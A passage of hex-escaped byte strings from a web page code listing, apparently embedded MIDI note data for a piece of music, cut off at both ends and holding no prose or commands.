/&gt;"\x00\x00\x39\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51".&lt;br /&gt;"\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x41".&lt;br /&gt;"\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x34\x51\x65".&lt;br /&gt;"\x34\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00".&lt;br /&gt;"\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c".&lt;br /&gt;"\x00\x00\x37\x00\x13\x34\x52\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x54\x65\x30\x00\x13\x3e\x54\x00\x3c\x54".&lt;br /&gt;"\x01\x39\x54\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x54\x65\x35\x00\x13\x3f".&lt;br /&gt;"\x54\x00\x3c\x54\x01\x39\x54\x64\x3f\x00\x00\x3c\x00\x00\x39\x00\x13\x37\x51\x65".&lt;br /&gt;"\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13\x34\x51\x65\x34\x00".&lt;br /&gt;"\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x32".&lt;br /&gt;"\x51\x65\x32\x00\x13\x3e\x51\x00\x37\x51\x65\x3e\x00\x00\x37\x00\x13\x37\x51\x00".&lt;br /&gt;"\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x51\x00\x24\x51\x65\x30\x00\x00\x24".&lt;br /&gt;"\x00\x81\x0c\x30\x51\x00\x24\x51\x64\x30\x00\x00\x24\x00\x81\x0c\x38\x54\x00\x2c".&lt;br /&gt;"\x54\x64\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00".&lt;br /&gt;"\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00\x13\x3c\x54".&lt;br /&gt;"\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38\x51\x00\x2c".&lt;br /&gt;"\x51\x65\x38\x00\x00\x2c\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".&lt;br /&gt;"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".&lt;br /&gt;"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31\x4e\x00\x27".&lt;br /&gt;"\x4e\x65\x31\x00\x00\x27\x00\x13\x3d\x4e\x00\x38\x4e\x01\x35\x4e\x64\x3d\x00\x00".&lt;br /&gt;"\x38\x00\x00\x35\x00\x13\x31\x4e\x00\x25\x4e\x65\x31\x00\x00\x25\x00\x13\x3d\x4e".&lt;br /&gt;"\x00\x38\x4e\x01\x35\x4e\x64\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x38\x4e\x00\x2c".&lt;br /&gt;"\x4e\x65\x38\x00\x00\x2c\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".&lt;br /&gt;"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".&lt;br /&gt;"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x3a\x4e\x00\x2e".&lt;br /&gt;"\x4e\x65\x3a\x00\x00\x2e\x00\x13\x3c\x4e\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00".&lt;br /&gt;"\x38\x00\x00\x33\x00\x13\x33\x4e\x00\x27\x4e\x65\x33\x00\x00\x27\x00\x13\x3c\x4e".&lt;br /&gt;"\x00\x38\x4e\x01\x33\x4e\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38\x50\x00\x2c".&lt;br /&gt;"\x50\x65\x38\x00\x00\x2c\x00\x13\x3c\x51\x00\x38\x51\x01\x33\x51\x64\x3c\x00\x00".&lt;br /&gt;"\x38\x00\x00\x33\x00\x13\x33\x51\x00\x27\x51\x65\x33\x00\x00\x27\x00\x13\x3c\x51".&lt;br /&gt;"\x00\x38\x51\x01\x33\x51\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31\x51\x00\x25".&lt;br /&gt;"\x51\x65\x31\x00\x00\x25\x00\x13\x2e\x51\x00\x22\x51\x65\x2e\x00\x00\x22\x00\x13".&lt;br /&gt;"\x33\x51\x00\x27\x51\x65\x33\x00\x00\x27\x00\x13\x3a\x51\x00\x37\x51\x01\x33\x51".&lt;br /&gt;"\x64\x3a\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x51\x00\x38\x51\x65\x3c\x00\x00\x38".&lt;br /&gt;"\x00\x82\x7c\x34\x54\x64\x34\x00\x13\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00".&lt;br /&gt;"\x13\x34\x54\x65\x34\x00\x13\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00\x13\x33".&lt;br /&gt;"\x54\x65\x33\x00\x13\x3b\x54\x00\x36\x54\x65\x3b\x00\x00\x36\x00\x13\x2e\x57\x65".&lt;br /&gt;"\x2e\x00\x13\x3b\x57\x00\x36\x57\x01\x34\x57\x64\x3b\x00\x00\x36\x00\x00\x34\x00".&lt;br /&gt;"\x13\x2a\x5a\x00\x34\x5a\x65\x2a\x00\x00\x34\x00\x13\x3a\x5a\x00\x36\x5a\x65\x3a".&lt;br /&gt;"\x00\x00\x36\x00\x13\x2a\x5d\x65\x2a\x00\x13\x3a\x5d\x00\x36\x5d\x01\x34\x5d\x64".&lt;br /&gt;"\x3a\x00\x00\x36\x00\x00\x34\x00\x13\x3b\x5a\x00\x36\x5a\x00\x33\x5a\x00\x2f\x5a".&lt;br /&gt;"\x65\x3b\x00\x00\x36\x00\x00\x33\x00\x00\x2f\x00\x82\x7c\x33\x54\x64\x33\x00\x13".&lt;br /&gt;"\x3b\x54\x00\x38\x54\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3b\x51".&lt;br /&gt;"\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x54\x65\x33\x00\x13\x3c\x54\x00\x38".&lt;br /&gt;"\x54\x65\x3c\x00\x00\x38\x00\x13\x33\x54\x65\x33\x00\x13\x3c\x54\x00\x38\x54\x65".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x13\x33\x52\x00\x27\x52\x65\x33\x00\x00\x27\x00\x13\x3d\x51".&lt;br /&gt;"\x00\x37\x51\x01\x33\x51\x64\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x33\x51\x00\x27".&lt;br /&gt;"\x51\x65\x33\x00\x00\x27\x00\x13\x3d\x51\x00\x37\x51\x01\x33\x51\x64\x3d\x00\x00".&lt;br /&gt;"\x37\x00\x00\x33\x00\x13\x3c\x51\x00\x38\x51\x65\x3c\x00\x00\x38\x00\x82\x7c\x38".&lt;br /&gt;"\x54\x00\x2c\x54\x64\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38".&lt;br /&gt;"\x54\x00\x2c\x54\x65\x38\x00\x00\x2c\x00\x13\x3c\x54\x00\x38\x54\x01\x33\x54\x64".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3c\x56\x00\x38\x56\x01\x33\x56\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31".&lt;br /&gt;"\x57\x00\x27\x57\x65\x31\x00\x00\x27\x00\x13\x3d\x57\x00\x38\x57\x01\x35\x57\x64".&lt;br /&gt;"\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x31\x57\x00\x25\x57\x65\x31\x00\x00\x25\x00".&lt;br /&gt;"\x13\x3d\x57\x00\x38\x57\x01\x35\x57\x64\x3d\x00\x00\x38\x00\x00\x35\x00\x13\x38".&lt;br /&gt;"\x57\x00\x2c\x57\x65\x38\x00\x00\x2c\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x3a".&lt;br /&gt;"\x57\x00\x2e\x57\x65\x3a\x00\x00\x2e\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x38".&lt;br /&gt;"\x57\x00\x2c\x57\x65\x38\x00\x00\x2c\x00\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64".&lt;br /&gt;"\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3c\x57\x00\x38\x57\x01\x33\x57\x64\x3c\x00\x00\x38\x00\x00\x33\x00\x13\x31".&lt;br /&gt;"\x57\x00\x25\x57\x65\x31\x00\x00\x25\x00\x13\x2e\x57\x00\x22\x57\x65\x2e\x00\x00".&lt;br /&gt;"\x22\x00\x13\x33\x57\x00\x27\x57\x65\x33\x00\x00\x27\x00\x13\x3a\x57\x00\x37\x57".&lt;br /&gt;"\x01\x33\x57\x64\x3a\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x54\x00\x38\x54\x65\x3c".&lt;br /&gt;"\x00\x00\x38\x00\x82\x7c\x34\x4e\x64\x34\x00\x13\x3b\x4e\x00\x38\x4e\x65\x3b\x00".&lt;br /&gt;"\x00\x38\x00\x13\x34\x4e\x65\x34\x00\x13\x3b\x4e\x00\x38\x4e\x65\x3b\x00\x00\x38".&lt;br /&gt;"\x00\x13\x33\x4e\x65\x33\x00\x13\x3b\x4e\x00\x36\x4e\x65\x3b\x00\x00\x36\x00\x13".&lt;br /&gt;"\x2e\x4e\x65\x2e\x00\x13\x3b\x4e\x00\x36\x4e\x01\x34\x4e\x64\x3b\x00\x00\x36\x00".&lt;br /&gt;"\x00\x34\x00\x13\x2a\x4e\x00\x34\x4e\x65\x2a\x00\x00\x34\x00\x13\x3a\x4e\x00\x36".&lt;br /&gt;"\x4e\x65\x3a\x00\x00\x36\x00\x13\x2a\x4e\x65\x2a\x00\x13\x3a\x4e\x00\x36\x4e\x01".&lt;br /&gt;"\x34\x4e\x64\x3a\x00\x00\x36\x00\x00\x34\x00\x13\x3b\x4e\x00\x36\x4e\x00\x33\x4e".&lt;br /&gt;"\x00\x2f\x4e\x65\x3b\x00\x00\x36\x00\x00\x33\x00\x00\x2f\x00\x82\x7c\x33\x51\x64".&lt;br /&gt;"\x33\x00\x13\x3b\x51\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00".&lt;br /&gt;"\x13\x3b\x51\x00\x38\x51\x65\x3b\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3c".&lt;br /&gt;"\x51\x00\x38\x51\x65\x3c\x00\x00\x38\x00\x13\x33\x51\x65\x33\x00\x13\x3c\x51\x00".&lt;br /&gt;"\x38\x51\x65\x3c\x00\x00\x38\x00\x13\x33\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00".&lt;br /&gt;"\x13\x3d\x54\x00\x37\x54\x01\x33\x54\x64\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x33".&lt;br /&gt;"\x54\x00\x27\x54\x65\x33\x00\x00\x27\x00\x13\x3d\x54\x00\x37\x54\x01\x33\x54\x64".&lt;br /&gt;"\x3d\x00\x00\x37\x00\x00\x33\x00\x13\x3c\x54\x00\x38\x54\x65\x3c\x00\x00\x38\x00".&lt;br /&gt;"\x81\x0c\x3d\x54\x00\x38\x54\x00\x35\x54\x00\x31\x54\x81\x5c\x3d\x00\x00\x38\x00".&lt;br /&gt;"\x00\x35\x00\x00\x31\x00\x13\x3c\x54\x00\x39\x54\x00\x35\x54\x00\x30\x54\x65\x3c".&lt;br /&gt;"\x00\x00\x39\x00\x00\x35\x00\x00\x30\x00\x13\x41\x54\x00\x35\x54\x81\x21\x41\x00".&lt;br /&gt;"\x00\x35\x00\x13\x40\x54\x00\x34\x54\x29\x40\x00\x00\x34\x00\x13\x3e\x54\x00\x32".&lt;br /&gt;"\x54\x29\x3e\x00\x00\x32\x00\x13\x3c\x54\x00\x30\x54\x29\x3c\x00\x00\x30\x00\x13".&lt;br /&gt;"\x34\x54\x00\x28\x54\x29\x34\x00\x00\x28\x00\x13\x35\x51\x00\x29\x51\x29\x35\x00".&lt;br /&gt;"\x00\x29\x00\x13\x37\x51\x00\x2b\x51\x81\x21\x37\x00\x00\x2b\x00\x13\x30\x51\x00".&lt;br /&gt;"\x24\x51\x29\x30\x00\x00\x24\x00\x13\x32\x51\x00\x26\x51\x29\x32\x00\x00\x26\x00".&lt;br /&gt;"\x13\x34\x51\x00\x28\x51\x29\x34\x00\x00\x28\x00\x13\x35\x51\x00\x29\x51\x65\x35".&lt;br /&gt;"\x00\x00\x29\x00\x13\x31\x51\x00\x25\x51\x81\x5d\x31\x00\x00\x25\x00\x13\x31\x51".&lt;br /&gt;"\x00\x25\x51\x65\x31\x00\x00\x25\x00\x13\x35\x51\x00\x29\x51\x65\x35\x00\x00\x29".&lt;br /&gt;"\x00\x81\x0c\x29\x51\x00\x1d\x51\x64\x29\x00\x00\x1d\x00\x81\x0c\x34\x4c\x64\x34".&lt;br /&gt;"\x00\x13\x3c\x46\x00\x3a\x46\x01\x37\x46\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13".&lt;br /&gt;"\x34\x40\x65\x34\x00\x13\x3c\x3a\x00\x3a\x3a\x01\x37\x3a\x64\x3c\x00\x00\x3a\x00".&lt;br /&gt;"\x00\x37\x00\x13\x34\x3a\x65\x34\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c".&lt;br /&gt;"\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x34\x65\x34\x00\x13\x3c\x34\x00\x3a\x34\x01".&lt;br /&gt;"\x37\x34\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x34\x65\x34\x00\x13\x3c\x34".&lt;br /&gt;"\x00\x39\x34\x65\x3c\x00\x00\x39\x00\x13\x30\x34\x65\x30\x00\x13\x3c\x37\x00\x39".&lt;br /&gt;"\x37\x65\x3c\x00\x00\x39\x00\x13\x34\x37\x65\x34\x00\x13\x3c\x37\x00\x39\x37\x65".&lt;br /&gt;"\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x39\x37\x65\x3c\x00".&lt;br /&gt;"\x00\x39\x00\x13\x37\x37\x65\x37\x00\x13\x40\x37\x00\x3c\x37\x01\x3a\x37\x64\x40".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x37\x65\x30\x00\x13\x40\x37\x00\x3c\x37\x01".&lt;br /&gt;"\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x37\x37\x65\x37\x00\x13\x40\x37".&lt;br /&gt;"\x00\x3c\x37\x01\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x37\x65\x30".&lt;br /&gt;"\x00\x13\x40\x37\x00\x3c\x37\x01\x3a\x37\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13".&lt;br /&gt;"\x35\x37\x65\x35\x00\x13\x41\x37\x00\x3c\x37\x01\x39\x37\x64\x41\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x39\x00\x13\x30\x38\x65\x30\x00\x13\x41\x37\x00\x3c\x37\x01\x39\x37\x64\x41".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x37\x65\x35\x00\x13\x41\x37\x00\x3c\x37\x01".&lt;br /&gt;"\x39\x37\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x41\x37".&lt;br /&gt;"\x00\x3c\x37\x01\x39\x37\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x34\x37\x65\x34".&lt;br /&gt;"\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13".&lt;br /&gt;"\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c\x00\x00\x3a\x00".&lt;br /&gt;"\x00\x37\x00\x13\x34\x37\x65\x34\x00\x13\x3c\x37\x00\x3a\x37\x01\x37\x37\x64\x3c".&lt;br /&gt;"\x00\x00\x3a\x00\x00\x37\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x37\x00\x3a\x37\x01".&lt;br /&gt;"\x37\x37\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x32\x37\x65\x32\x00\x13\x3c\x37".&lt;br /&gt;"\x00\x39\x37\x65\x3c\x00\x00\x39\x00\x13\x30\x37\x65\x30\x00\x13\x3c\x3a\x00\x39".&lt;br /&gt;"\x3a\x65\x3c\x00\x00\x39\x00\x13\x32\x3a\x65\x32\x00\x13\x3c\x3d\x00\x39\x3d\x65".&lt;br /&gt;"\x3c\x00\x00\x39\x00\x13\x30\x3d\x65\x30\x00\x13\x3c\x3d\x00\x39\x3d\x65\x3c\x00".&lt;br /&gt;"\x00\x39\x00\x13\x31\x40\x65\x31\x00\x13\x3b\x43\x00\x38\x43\x01\x35\x43\x64\x3b".&lt;br /&gt;"\x00\x00\x38\x00\x00\x35\x00\x13\x31\x46\x65\x31\x00\x13\x3b\x49\x00\x38\x49\x01".&lt;br /&gt;"\x35\x49\x64\x3b\x00\x00\x38\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4e".&lt;br /&gt;"\x00\x39\x4e\x01\x35\x4e\x64\x3c\x00\x00\x39\x00\x00\x35\x00\x13\x30\x51\x65\x30".&lt;br /&gt;"\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13".&lt;br /&gt;"\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x3a\x51\x64\x40\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x3a\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x3a\x51\x64\x40".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x3a\x00\x13\x40\x51\x00\x3c\x51\x00\x39\x51\x00\x35\x51\x65".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x00\x39\x00\x00\x35\x00\x82\x7c\x34\x4e\x64\x34\x00\x13\x3c".&lt;br /&gt;"\x4e\x00\x3a\x4e\x01\x37\x4e\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x4c\x65".&lt;br /&gt;"\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64\x3c\x00\x00\x3a\x00\x00\x37\x00".&lt;br /&gt;"\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64\x3c\x00\x00\x3a".&lt;br /&gt;"\x00\x00\x37\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64".&lt;br /&gt;"\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x39\x4c".&lt;br /&gt;"\x65\x3c\x00\x00\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c".&lt;br /&gt;"\x00\x00\x39\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c\x00\x00".&lt;br /&gt;"\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c\x00\x00\x39\x00".&lt;br /&gt;"\x13\x37\x4c\x65\x37\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c".&lt;br /&gt;"\x00\x00\x3a\x00\x13\x30\x4c\x65\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x37\x49\x65\x37\x00\x13\x40\x49\x00\x3c\x49".&lt;br /&gt;"\x01\x3a\x49\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x49\x65\x30\x00\x13\x40".&lt;br /&gt;"\x49\x00\x3c\x49\x01\x3a\x49\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x35\x49\x65".&lt;br /&gt;"\x35\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64\x41\x00\x00\x3c\x00\x00\x39\x00".&lt;br /&gt;"\x13\x30\x49\x65\x30\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64\x41\x00\x00\x3c".&lt;br /&gt;"\x00\x00\x39\x00\x13\x35\x49\x65\x35\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64".&lt;br /&gt;"\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x41\x4a\x00\x3c\x4a".&lt;br /&gt;"\x01\x39\x4a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x34\x49\x65\x34\x00\x13\x3c".&lt;br /&gt;"\x49\x00\x3a\x49\x01\x37\x49\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x30\x49\x65".&lt;br /&gt;"\x30\x00\x13\x3c\x47\x00\x3a\x47\x01\x37\x47\x64\x3c\x00\x00\x3a\x00\x00\x37\x00".&lt;br /&gt;"\x13\x34\x46\x65\x34\x00\x13\x3c\x43\x00\x3a\x43\x01\x37\x43\x64\x3c\x00\x00\x3a".&lt;br /&gt;"\x00\x00\x37\x00\x13\x30\x40\x65\x30\x00\x13\x3c\x3a\x00\x3a\x3a\x01\x37\x3a\x64".&lt;br /&gt;"\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x32\x37\x65\x32\x00\x13\x3c\x37\x00\x39\x37".&lt;br /&gt;"\x65\x3c\x00\x00\x39\x00\x13\x30\x34\x65\x30\x00\x13\x3c\x34\x00\x39\x34\x65\x3c".&lt;br /&gt;"\x00\x00\x39\x00\x13\x32\x3a\x65\x32\x00\x13\x3c\x3d\x00\x39\x3d\x65\x3c\x00\x00".&lt;br /&gt;"\x39\x00\x13\x30\x3f\x65\x30\x00\x13\x3c\x3f\x00\x39\x3f\x65\x3c\x00\x00\x39\x00".&lt;br /&gt;"\x13\x31\x4e\x65\x31\x00\x13\x3b\x4e\x00\x38\x4e\x01\x35\x4e\x64\x3b\x00\x00\x38".&lt;br /&gt;"\x00\x00\x35\x00\x13\x31\x4c\x65\x31\x00\x13\x3b\x4c\x00\x38\x4c\x01\x35\x4c\x64".&lt;br /&gt;"\x3b\x00\x00\x38\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c".&lt;br /&gt;"\x01\x35\x4c\x64\x3c\x00\x00\x39\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x40".&lt;br /&gt;"\x4c\x00\x3c\x4c\x01\x39\x4c\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x4c\x65".&lt;br /&gt;"\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c\x00\x00\x3a\x00".&lt;br /&gt;"\x13\x30\x4c\x65\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c".&lt;br /&gt;"\x00\x00\x3a\x00\x13\x40\x49\x00\x3c\x49\x00\x39\x49\x00\x35\x49\x65\x40\x00\x00".&lt;br /&gt;"\x3c\x00\x00\x39\x00\x00\x35\x00\x81\x0c\x35\x3a\x00\x29\x3a\x64\x35\x00\x00\x29".&lt;br /&gt;"\x00\x13\x36\x37\x00\x2a\x37\x65\x36\x00\x00\x2a\x00\x13\x37\x34\x00\x2b\x34\x65".&lt;br /&gt;"\x37\x00\x00\x2b\x00\x13\x39\x34\x00\x2d\x34\x81\x21\x39\x00\x00\x2d\x00\x13\x37".&lt;br /&gt;"\x37\x00\x2b\x37\x29\x37\x00\x00\x2b\x00\x13\x36\x37\x00\x2a\x37\x29\x36\x00\x00".&lt;br /&gt;"\x2a\x00\x13\x37\x37\x00\x2b\x37\x29\x37\x00\x00\x2b\x00\x13\x3c\x37\x00\x30\x37".&lt;br /&gt;"\x65\x3c\x00\x00\x30\x00\x13\x3e\x3a\x00\x32\x3a\x81\x21\x3e\x00\x00\x32\x00\x13".&lt;br /&gt;"\x3c\x3d\x00\x30\x3d\x29\x3c\x00\x00\x30\x00\x13\x3b\x40\x00\x2f\x40\x29\x3b\x00".&lt;br /&gt;"\x00\x2f\x00\x13\x3c\x40\x00\x30\x40\x29\x3c\x00\x00\x30\x00\x13\x41\x46\x00\x3b".&lt;br /&gt;"\x46\x01\x37\x46\x81\x5c\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x41\x57\x00\x3b\x57".&lt;br /&gt;"\x00\x37\x57\x81\x5d\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x40\x4e\x00\x3c\x4e\x65".&lt;br /&gt;"\x40\x00\x00\x3c\x00\x81\x0c\x30\x49\x00\x24\x49\x64\x30\x00\x00\x24\x00\x81\x0c".&lt;br /&gt;"\x29\x51\x64\x29\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x39\x00\x13\x29\x51\x65\x29\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01".&lt;br /&gt;"\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51".&lt;br /&gt;"\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51\x65\x2b".&lt;br /&gt;"\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13".&lt;br /&gt;"\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00".&lt;br /&gt;"\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01".&lt;br /&gt;"\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x29\x51\x65\x29\x00\x13\x41\x51".&lt;br /&gt;"\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x51\x65\x2d".&lt;br /&gt;"\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13".&lt;br /&gt;"\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".&lt;br /&gt;"\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40".&lt;br /&gt;"\x00\x00\x3c\x00\x00\x37\x00\x13\x39\x51\x00\x2d\x51\x65\x39\x00\x00\x2d\x00\x13".&lt;br /&gt;"\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x53".&lt;br /&gt;"\x00\x29\x53\x65\x35\x00\x00\x29\x00\x13\x35\x54\x00\x29\x54\x65\x35\x00\x00\x29".&lt;br /&gt;"\x00\x13\x34\x57\x00\x28\x57\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x5d\x00\x30\x5d".&lt;br /&gt;"\x81\x5c\x3c\x00\x00\x30\x00\x13\x29\x5d\x65\x29\x00\x13\x40\x57\x00\x3c\x57\x01".&lt;br /&gt;"\x39\x57\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x40\x54".&lt;br 